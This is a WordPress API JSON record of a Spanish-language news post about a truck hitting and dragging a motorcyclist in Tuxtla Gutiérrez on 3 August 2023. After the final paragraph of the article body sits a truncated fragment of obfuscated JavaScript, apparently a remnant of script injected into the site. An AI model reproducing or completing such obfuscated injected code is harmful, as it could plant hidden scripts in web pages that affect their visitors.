{"id":11150,"date":"2023-08-04T03:19:03","date_gmt":"2023-08-04T03:19:03","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=11150"},"modified":"2023-08-04T03:19:03","modified_gmt":"2023-08-04T03:19:03","slug":"camion-atropella-y-arrastra-a-motociclista","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=11150","title":{"rendered":"Cami\u00f3n atropella y arrastra a motociclista"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/FB_IMG_1691119066604-1024x768.jpg\" alt=\"\" class=\"wp-image-11151\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/FB_IMG_1691119066604-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/FB_IMG_1691119066604-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/FB_IMG_1691119066604-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/FB_IMG_1691119066604.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 3 de agosto del 2023. Tuxtla Guti\u00e9rrez. &#8211; Este jueves un cami\u00f3n atropell\u00f3 y arrastr\u00f3 varios metros a un motociclista que circulaba sobre la Calle Espa\u00f1a de la Colonia El Retiro.<\/p>\n\n\n\n<p>Los reportes oficiales informaron que, este hecho ocurri\u00f3 cuando el conductor de la Italika de color rojo, circulaba de Norte a Sur y al llegar a la Avenida se pas\u00f3 el alto.<\/p>\n\n\n\n<p>Esto ocasion\u00f3 que, un cami\u00f3n de color negro mate, circulaba de Poniente a Oriente con preferencia e impact\u00f3 al motociclista que fue arrastrado.<\/p>\n\n\n\n<p>Al lugar arribaron param\u00e9dicos de Protecci\u00f3n Civil Municipal para atender al lesionado que fue trasladado a un nosocomio particular para su atenci\u00f3n m\u00e9dica especializada.<\/p>\n\n\n\n<p>Las dos unidades fueron puestas a disposici\u00f3n del Ministerio p\u00fablico en turno para deslindar responsabilidades.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 3 de agosto del 2023. Tuxtla Guti\u00e9rrez. &#8211; Este jueves un cami\u00f3n atropell\u00f3 y arrastr\u00f3 varios metros a un motociclista que circulaba sobre la Calle Espa\u00f1a de la Colonia El Retiro. Los reportes oficiales informaron que, este hecho ocurri\u00f3 cuando el conductor de la Italika de color rojo, circulaba de Norte &hellip;<\/p>\n","protected":false},"author":2,"featured_media":11151,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-11150","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11150","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=11150"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11150\/revisions"}],"predecessor-version":[{"id":11152,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11150\/revisions\/11152"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/11151"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=11150"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=11150"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=11150"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}